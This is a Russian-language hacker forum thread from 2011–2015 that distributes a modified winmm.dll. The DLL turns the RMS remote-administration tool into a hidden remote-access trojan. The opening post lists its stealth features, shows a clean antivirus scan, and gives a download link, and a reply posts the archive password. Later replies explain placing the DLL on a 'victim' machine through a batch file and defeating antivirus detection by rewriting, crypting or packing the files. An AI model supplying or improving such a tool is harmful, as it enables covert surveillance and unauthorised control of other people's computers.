Скрытый RMS [удаленное администрирование]

Тема в разделе "Самое важное", создана пользователем sawyer1992, 25 фев 2011.

  1. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    62
    winmm.dll под 5.6-6.1 (tektonit/usoris)

    Должна лежать рядом с rutserv.exe
    [+] scan
    Название файла: winmm.dll
    Размер файла: 103936 байт
    Дата сканирования: Sun, 22 Mar 15 04:48:35 -0400
    MD5-хэш файла: 9a5614ccf289f4142856626dc4894dea

    Результат: 0 из 39

    Ad-Aware: OK
    AhnLab V3 Internet Security: OK
    ArcaVir: OK
    Avast: OK
    AVG: OK
    Avira: OK
    Bitdefender/BullGuard: OK
    BullGuard Internet Security 2013: OK
    ClamAV (UNIX version): OK
    Comodo: OK
    Dr.Web: OK
    Emsisoft Anti-Malware (a-squared Anti-Malware): OK
    eScan Internet Security Suite 14: OK
    Fortinet 5: OK
    F-Prot: OK
    F-Secure 2014: OK
    G Data: OK
    IKARUS: OK
    Immunet: OK
    K7 Ultimate: OK
    Kaspersky Internet Security 2014: OK
    Malware bytes: OK
    McAfee Total Protection 2013: OK
    Microsoft Security Essentials: OK
    NANO: OK
    NOD32: OK
    Norman: OK
    Norton Internet Security: OK
    Outpost Security Suite Pro 8.0: OK
    Panda Antivirus: OK
    Quick Heal: OK
    Sophos: OK
    SUPERAntiSpyware: OK
    Total Defense Internet Security: OK
    Trendmicro Titanium Internet Security: OK
    Twister Antivirus 8: OK
    VBA: OK
    VIPRE Internet Security 2013: OK
    Virit: OK

    Scan report generated by Scanner.FuckAV.ru
    [свернуть]

    • скрыты окна об отправке мыла/о видеонаблюдении
    • переименована служба/изменено описание в виндовом фаерволе (настраивается)
    • удаляет себя из списка установленных программ
    • удаляет службу оригинального RMS (если таковой был установлен ранее, сомнительная фича)
    • заметным файлам устанавливаются атрибуты скрытый и системный

    Проверялось кое-как, поэтому если возникают какие-то проблемы - формулируйте чётко.

    [+] Настройка названия/описания в службах, фаерволе (не обязательно, всё уже настроено)
    Откройте в любом редакторе ресурсов (например в ResHacker) winmm.dll.
    Что за что отвечает - на картинке.

    [​IMG]
    [свернуть]


    СКАЧАТЬ
    https://www.sendspace.com/file/ijr40x
     
    Последнее редактирование: 22 мар 2015
    9 мар 2015
  2. YandexBot
    YandexBot Новичок
    Симпатии:
    0
    ээм а какой пароль от архива? :dontknow:
     
    18 мар 2015
  3. Raritet1982
    Raritet1982 Новичок
    Симпатии:
    0
    Пароль вроде 123123

    Добавлено через 2 минуты
    При попытке просмотреть видео gпрерывается каждую секунду (отключает просто) . также и с аудио. ( В чем может быть проблемма ? RMS 6.1
     
    Последнее редактирование: 18 мар 2015
    18 мар 2015
  4. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    62
    Если без длл все ок то вероятно проблема в в чём-то. Потестю, поправлю. :)
     
    18 мар 2015
  5. technowizard
    technowizard Новичок
    Симпатии:
    0
    подскажите длл нужно поместить в установщик msi?
     
    19 мар 2015
  6. medvedev33
    medvedev33 Новичок
    Симпатии:
    2
    Не обязательно в сам установщик совать, можно на системе жертвы сделать установку тех файлов и к ним перед их запуском уже подложить либу и делают все это обычно через батник, но есть разные варианты исполнения
     
    19 мар 2015
  7. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    62
    Обновил дллку.
    Если хотите подсунуть дллку в папку с уже установленным ранее рмс - перед этим обязательно поменяйте в дллке редактором ресурсов строку с ID 1088 c "1" на "0".
     
    22 мар 2015
  8. valtron
    valtron Новичок
    Симпатии:
    0
    С RMS 6.1 работать не хочет, закрывается с ошибкой. На версии 6.0 служба не переименовывается, а так свои функции выполняет на отлично, всплывающее окно прячет хорошо. Ложил в папку с установленной ранее рмс, строку на "0" поменял.
     
    23 мар 2015
  9. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    62
    Какая ось и что за ошибка?
     
    23 мар 2015
  10. valtron
    valtron Новичок
    Симпатии:
    0
    Система вин 7 проф. 32-х битная. тут на версии рмс 6.0 ошибка, на 6.1 такая же была. Перешил БИОС, ошибка на рмс 6.0 пропала. на рмс 6.1 проверить уже не смог, ноут забрали.
     
    24 мар 2015
  11. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    62
    Очевидно что ошибка из-за манипуляций с именем сервиса. На досуге посмотрю.
     
    24 мар 2015
  12. c0d0
    c0d0 Новичок
    Симпатии:
    0
    Windows Defender удаляет install.bat нa Windows 8.1
    Dr.Web удаляет install.bat как исполняемый файл, а de.exe распознает как троян.
    Вот такие дела ребята.
     
    8 апр 2015
  13. medvedev33
    medvedev33 Новичок
    Симпатии:
    2
    Да вы чо? Правда что ли?
    А пацаны и не знали!
     
    8 апр 2015
  14. c0d0
    c0d0 Новичок
    Симпатии:
    0
    1505
     
    8 апр 2015
  15. medvedev33
    medvedev33 Новичок
    Симпатии:
    2
    Детект с батника сбивается переписыванием кода (это же очевидно), а детект на сам файл решается переходом на новую версию от Бернса или самостоятельной криптовкой (возможно, что может помочь и паковка чем-нибудь, тут все опытным путем).
     
    8 апр 2015
  16. Dima1980
    Dima1980 Новичок
    Симпатии:
    0
    Подскажите пароль на архив !!!
     
    12 апр 2015
  17. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Если удосужиться прочитать тему, то пароль найти не проблема!
    P.S. Для лентяев:123123:af:
     
    12 апр 2015
  18. CEBEP13
    CEBEP13 Новичок
    Симпатии:
    0
    Вопрос снят. Автору респект!
     
    Последнее редактирование: 22 апр 2015
    22 апр 2015
  19. BMV1243
    BMV1243 Новичок
    Симпатии:
    0
    Ребят, помогите дураку, срочно надо, пожалуйста.
     
    4 май 2015
  20. onthar
    onthar Продвинутый
    Симпатии:
    224
    мозгов отсыпать что ли?
     
    4 май 2015
Загрузка...